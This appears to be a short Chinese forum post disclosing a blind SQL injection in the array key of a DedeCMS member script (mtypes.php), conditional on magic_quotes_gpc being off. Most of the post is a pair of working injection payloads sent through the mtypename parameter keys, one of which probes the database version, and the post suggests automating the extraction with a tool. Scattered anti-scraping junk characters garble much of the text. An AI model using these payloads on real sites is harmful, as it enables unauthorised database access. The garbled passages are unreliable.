需要magic_quotes_gpc = Off,所以说是鸡肋啊.
* \: o" K1 r+ U1 W$ `6 g
" `! W$ W ]7 N: Q& A- n
" C0 B$ w9 ^; q发生在数组key里的注射漏洞,有点意思.* ?& z5 W! X V4 z. W- k
. x" ^5 i8 w( @" P
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下+ V# E0 }7 }+ q
- j' q( [; \$ ~
http://www.xxx.com /dede/member/mtypes.php?dopost=save
K8 b! [8 |: [9 k' E- v0 k: R
* X8 u4 V0 }3 O [exploit:- w3 {- ~7 v0 u( I, J
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r/ c1 \6 b" `( _: b4 D
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r! H: F K0 @% G: h: o, ]8 ^
|